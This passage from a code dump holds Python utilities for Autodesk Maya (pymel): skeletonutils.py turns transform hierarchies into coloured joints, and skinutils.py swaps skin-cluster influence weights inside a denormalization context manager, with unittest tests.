settings = dict(charcreator.SETTINGS_DEFAULT,
prefix=unicode(prefix))
charcreator.convert_hierarchies_main(settings)
```
#### File: 1fth3n3ls3/pylib/skeletonutils.py
```python
import pymel.core as pmc
import utils
# Version 3
def safe_setparent(node, parent):
"""`node.setParent(parent)` if `parent` is
not the same as `node`'s existing parent.
"""
if node.getParent() != parent:
node.setParent(parent)
GREEN = 14
BLUE = 6
YELLOW = 17
def _convert_to_joint(node, parent, prefix,
jnt_size, lcol, rcol, ccol):
pmc.select(clear=True)
j = pmc.joint(name=prefix + node.name())
safe_setparent(j, parent)
j.translate.set(node.translate.get())
j.rotate.set(node.rotate.get())
j.setRadius(jnt_size)
def calc_wirecolor():
x = j.translateX.get()
if x < -0.001:
return rcol
elif x > 0.001:
return lcol
else:
return ccol
j.overrideColor.set(calc_wirecolor())
return j
def convert_to_skeleton(rootnode,
prefix='skel_',
joint_size=1.0,
lcol=BLUE,
rcol=GREEN,
ccol=YELLOW,
_parent=None):
if _parent is None:
_parent = rootnode.getParent()
j = _convert_to_joint(
rootnode, _parent, prefix, joint_size, lcol, rcol, ccol)
children = [node for node in rootnode.getChildren() if utils.isType(node, 'transform')]
for c in children:
convert_to_skeleton(c, prefix, joint_size, lcol, rcol, ccol, j)
return j
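# Example usage (a sketch, run inside Maya with a transform hierarchy selected):
#   root = pmc.selected()[0]
#   skel_root = convert_to_skeleton(root, prefix='skel_', joint_size=0.5)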
def ancestors(node):
"""Return a list of ancestors, starting with the direct parent
and ending with the top-level (root) parent."""
result = []
parent = node.getParent()
while parent is not None:
result.append(parent)
parent = parent.getParent()
return result
def uniqueroots(nodes): #(1)
"""Returns a list of the nodes in `nodes` that are not
children of any node in `nodes`."""
result = []
def handle_node(node): #(2)
"""If any of the ancestors of n are in realroots,
just return, otherwise, append n to realroots.
"""
for ancestor in ancestors(node):
if ancestor in nodes: #(4)
return
result.append(node) #(5)
for node in nodes: #(3)
handle_node(node)
return result
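# Example (sketch): if `nodes` holds both a group and one of its children,
# uniqueroots(nodes) returns only the group, since the child has an ancestor in `nodes`.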
```
#### File: 1fth3n3ls3/pylib/skinutils.py
```python
import unittest
import pymel.core as pmc
class denormalized_skin_1(object):
"""Turns off skin cluster normalization and maintaining
max influrnces."""
def __init__(self, skinCl):
self.skinCl = skinCl
self.maxInfl, self.norm = None, None
def __enter__(self):
self.maxInfl = self.skinCl.maintainMaxInfluences.get()
self.norm = self.skinCl.setNormalizeWeights(q=True)
self.skinCl.maintainMaxInfluences.set(False)
self.skinCl.setNormalizeWeights(0)
def __exit__(self, *_):
if self.maxInfl is not None:
self.skinCl.maintainMaxInfluences.set(self.maxInfl)
if self.norm is not None:
self.skinCl.setNormalizeWeights(self.norm)
_denormalized_skins = set() #(1)
class denormalized_skin_2(object):
"""Turns off skin cluster normalization and maintaining
max influrnces."""
def __init__(self, skinCl):
self.skinCl = skinCl
self.maxInfl, self.norm = None, None
def __enter__(self):
if self.skinCl in _denormalized_skins: #(2)
return
_denormalized_skins.add(self.skinCl) #(3)
self.maxInfl = self.skinCl.maintainMaxInfluences.get()
self.norm = self.skinCl.setNormalizeWeights(q=True)
self.skinCl.maintainMaxInfluences.set(False)
self.skinCl.setNormalizeWeights(0)
def __exit__(self, *_):
_denormalized_skins.discard(self.skinCl) #(4)
if self.maxInfl is not None: #(5)
self.skinCl.maintainMaxInfluences.set(self.maxInfl)
if self.norm is not None:
self.skinCl.setNormalizeWeights(self.norm)
denormalized_skin = denormalized_skin_2
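# Example usage (a sketch; `skinCl` is a skinCluster node and `jointA`/`jointB`
# are hypothetical influences): denormalize once around a batch of fast swaps.
#   with denormalized_skin(skinCl):
#       for vert in verts:
#           swap_influence_fast(skinCl, vert, jointA, jointB)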
def swap_influence_1(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences."""
valA = pmc.skinPercent(skinCl, vert, q=True, t=inflA)
valB = pmc.skinPercent(skinCl, vert, q=True, t=inflB)
with denormalized_skin(skinCl):
pmc.skinPercent(skinCl, vert, tv=[inflA, valB])
pmc.skinPercent(skinCl, vert, tv=[inflB, valA])
def swap_influence_2(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences."""
with denormalized_skin(skinCl):
swap_influence_fast(skinCl, vert, inflA, inflB)
def swap_influence_fast(skinCl, vert, inflA, inflB):
"""For a given vertex,
swaps the weight between two influences.
`skinCl` should be denormalized before calling this function.
See `denormalized_skin`.
"""
valA = pmc.skinPercent(skinCl, vert, q=True, t=inflA)
valB = pmc.skinPercent(skinCl, vert, q=True, t=inflB)
pmc.skinPercent(skinCl, vert, tv=[inflA, valB])
pmc.skinPercent(skinCl, vert, tv=[inflB, valA])
class Tests(unittest.TestCase):
def setUp(self):
try:
for t in 'joint', 'skinCluster', 'transform':
for o in pmc.ls(type=t):
if pmc.objExists(o):
print(o.name(), ' object ---------------------------')
pmc.delete(o)
        except Exception:
            pass
def _testSwap(self, func, swap):
global denormalized_skin
denormalized_skin = func
joints = [
pmc.joint(p=(-3.0, 0.0,-12.0)),
pmc.joint(p=(-3.0, 0.0, -5.0)),
pmc.joint(p=(1.0, 0.0, 5.5)),
pmc.joint(p=(6.0, 0.0, 10.0))]
plane = pmc.polyPlane(w=20.0,h=20.0,sx=25,sy=25)[0]
cl = pmc.skinCluster(joints, plane)
def getweight(ind):
return pmc.skinPercent(cl, plane.vtx[0], q=True, t=joints[ind])
self.assertEqual(getweight(0), 0.0)
self.assertEqual(getweight(1), 0.5)
swap(cl, plane.vtx[0], joints[0], joints[1])
self.assertEqual(getweight(0), 0.5)
self.assertEqual(getweight(1), 0.0)
def testDenorm1Swap1(self):
self._testSwap(denormalized_skin_1, swap_influence_1)
def testDenorm1Swap2(self):
self._testSwap(denormalized_skin_1, swap_influence_2)
def testDenorm2Swap2(self):
self._testSwap(denormalized_skin_2, swap_influence_2)
if __name__ == '__main__':
unittest.main()
``` |